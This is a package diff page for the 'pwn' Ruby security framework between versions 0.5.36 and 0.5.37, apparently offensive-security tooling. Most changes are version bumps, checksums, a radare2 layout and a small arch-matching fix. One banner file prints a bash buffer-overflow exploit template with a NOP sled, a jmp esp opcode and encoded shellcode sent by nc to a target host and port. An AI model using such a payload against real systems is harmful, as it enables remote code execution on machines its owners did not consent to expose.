pwn 0.5.36 → 0.5.37
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/README.md +3 -3
- data/lib/pwn/banner/jmp_esp.rb +2 -2
- data/lib/pwn/banner/radare2.rb +3 -9
- data/lib/pwn/plugins/assembly.rb +2 -2
- data/lib/pwn/version.rb +1 -1
- data/third_party/r2-pwn-layout +1 -0
- metadata +2 -1
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: bb526bdd28c2934926712cd69973337e9a3736350a1b914f5c3233dd2f7584d7
|
4
|
+
data.tar.gz: b808fff5507ebb35d94f535a196679ff95ff41255ed509efd2fe465aacefc500
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 9218c49c6d11ff327daa6b40c57753ea5a5ce5d84915c79369f822b03101cdc14fb6e4641ab91b6a8a6765fb59a5431b8739af7088d84eb06138597c5351d5d2
|
7
|
+
data.tar.gz: 32e89872dc6d39000bf9bb50abcc581a4387db007d137ef613b90b8516c3d0153e54cb40d922254c58b737a5705dca593a76935c6031ea2783fe26f26cfdbb88
|
data/README.md
CHANGED
@@ -37,7 +37,7 @@ $ cd /opt/pwn
|
|
37
37
|
$ ./install.sh
|
38
38
|
$ ./install.sh ruby-gem
|
39
39
|
$ pwn
|
40
|
-
pwn[v0.5.
|
40
|
+
pwn[v0.5.37]:001 >>> PWN.help
|
41
41
|
```
|
42
42
|
|
43
43
|
[![Installing the pwn Security Automation Framework](https://raw.githubusercontent.com/0dayInc/pwn/master/documentation/pwn_install.png)](https://youtu.be/G7iLUY4FzsI)
|
@@ -52,7 +52,7 @@ $ rvm use ruby-3.3.0@pwn
|
|
52
52
|
$ gem uninstall --all --executables pwn
|
53
53
|
$ gem install --verbose pwn
|
54
54
|
$ pwn
|
55
|
-
pwn[v0.5.
|
55
|
+
pwn[v0.5.37]:001 >>> PWN.help
|
56
56
|
```
|
57
57
|
|
58
58
|
If you're using a multi-user install of RVM do:
|
@@ -62,7 +62,7 @@ $ rvm use ruby-3.3.0@pwn
|
|
62
62
|
$ rvmsudo gem uninstall --all --executables pwn
|
63
63
|
$ rvmsudo gem install --verbose pwn
|
64
64
|
$ pwn
|
65
|
-
pwn[v0.5.
|
65
|
+
pwn[v0.5.37]:001 >>> PWN.help
|
66
66
|
```
|
67
67
|
|
68
68
|
PWN periodically upgrades to the latest version of Ruby which is reflected in `/opt/pwn/.ruby-version`. The easiest way to upgrade to the latest version of Ruby from a previous PWN installation is to run the following script:
|
data/lib/pwn/banner/jmp_esp.rb
CHANGED
@@ -12,10 +12,10 @@ module PWN
|
|
12
12
|
public_class_method def self.get
|
13
13
|
'
|
14
14
|
#!/bin/bash
|
15
|
-
|
15
|
+
crash=$(printf \'\x90%.0s\' {1..1337})
|
16
16
|
asm_ops=\'\xff\xe4\'
|
17
17
|
sh_code=\'\x6a\x14\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0c\x09\x11\xb5\x83\xeb\xfc\xe2\xf4\x3d\xd2\xe6\x56\x5f\x4a\x42\xdf\x0e\x80\xf0\x05\x6a\xc4\x91\xee\x52\x5b\x79\xb7\x0c\x0c\x28\xdf\x1c\x58\x41\x3c\xed\x63\x77\xed\xc1\x89\x98\xf4\x08\xba\x15\x05\x6a\xc4\x91\xf6\xbc\x6f\xdc\x35\x9f\x50\x7b\x8a\x54\xc4\x91\xfc\x75\xf1\x79\x9a\x23\x7a\x79\xdd\x23\x6b\x78\xdb\x85\xea\x41\xe6\x85\xe8\xa1\xbe\xc1\x89\x11\xb5\'
|
18
|
-
pwn="${
|
18
|
+
pwn="${crash}${sh_code}${asm_ops}"
|
19
19
|
echo -en $pwn | nc $TARGET $PORT
|
20
20
|
'.red
|
21
21
|
rescue StandardError => e
|
data/lib/pwn/banner/radare2.rb
CHANGED
@@ -11,15 +11,9 @@ module PWN
|
|
11
11
|
|
12
12
|
public_class_method def self.get
|
13
13
|
'
|
14
|
-
$
|
15
|
-
|
16
|
-
|
17
|
-
[0x7f000070776e]> afl ~..
|
18
|
-
[0x7f000070776e]> db main
|
19
|
-
[0x7f000070776e]> db
|
20
|
-
[0x7f000070776e]> dc
|
21
|
-
[0x7f000070776e]> pdg
|
22
|
-
[0x7f000070776e]> v
|
14
|
+
$ target_arm_bin="/usr/bin/id";
|
15
|
+
$ alias r2="setarch $(uname -m) -R r2 -AA -c \"v /opt/pwn/third_party/r2-pwn-layout\""
|
16
|
+
$ r2 -c "db (0x`readelf -S $target_arm_bin | grep text | awk "{print $NF}"`)+0x4+0x00000328" -c "ood" -c "dc" -c "v" $target_arm_bin
|
23
17
|
'.yellow
|
24
18
|
rescue StandardError => e
|
25
19
|
raise e
|
data/lib/pwn/plugins/assembly.rb
CHANGED
@@ -22,7 +22,7 @@ module PWN
|
|
22
22
|
|
23
23
|
raise 'ERROR: opcodes parameter is required.' if opcodes.nil?
|
24
24
|
|
25
|
-
case arch
|
25
|
+
case arch.to_s.downcase
|
26
26
|
when 'i386', 'i686', 'x86'
|
27
27
|
arch_obj = Metasm::Ia32.new(endian)
|
28
28
|
when 'amd64', 'x86_64'
|
@@ -82,7 +82,7 @@ module PWN
|
|
82
82
|
|
83
83
|
raise 'ERROR: asm parameter is required.' if asm.nil?
|
84
84
|
|
85
|
-
case arch
|
85
|
+
case arch.to_s.downcase
|
86
86
|
when 'i386', 'i686', 'x86'
|
87
87
|
arch_obj = Metasm::Ia32.new(endian)
|
88
88
|
when 'amd64', 'x86_64'
|
data/lib/pwn/version.rb
CHANGED
@@ -0,0 +1 @@
|
|
1
|
+
{"Title":"Disassembly","Cmd":"pd","x":0,"y":1,"w":100,"h":38},{"Title":"Stack","Cmd":"pxq 256","x":0,"y":39,"w":100,"h":16},{"Title":"Hexdump","Cmd":"xc $r*16","x":0,"y":55,"w":100,"h":16},{"Title":"Registers","Cmd":"dr","x":100,"y":1,"w":35,"h":70},{"Title":"Function Calls","Cmd":"aflm","x":135,"y":1,"w":44,"h":70}
|
metadata
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: pwn
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.5.
|
4
|
+
version: 0.5.37
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- 0day Inc.
|
@@ -2185,6 +2185,7 @@ files:
|
|
2185
2185
|
- spec/spec_helper.rb
|
2186
2186
|
- third_party/.gitkeep
|
2187
2187
|
- third_party/http-request-headers-fields-large.txt
|
2188
|
+
- third_party/r2-pwn-layout
|
2188
2189
|
- update_pwn.sh
|
2189
2190
|
- upgrade_ruby.sh
|
2190
2191
|
- vagrant/provisioners/apache2.sh
|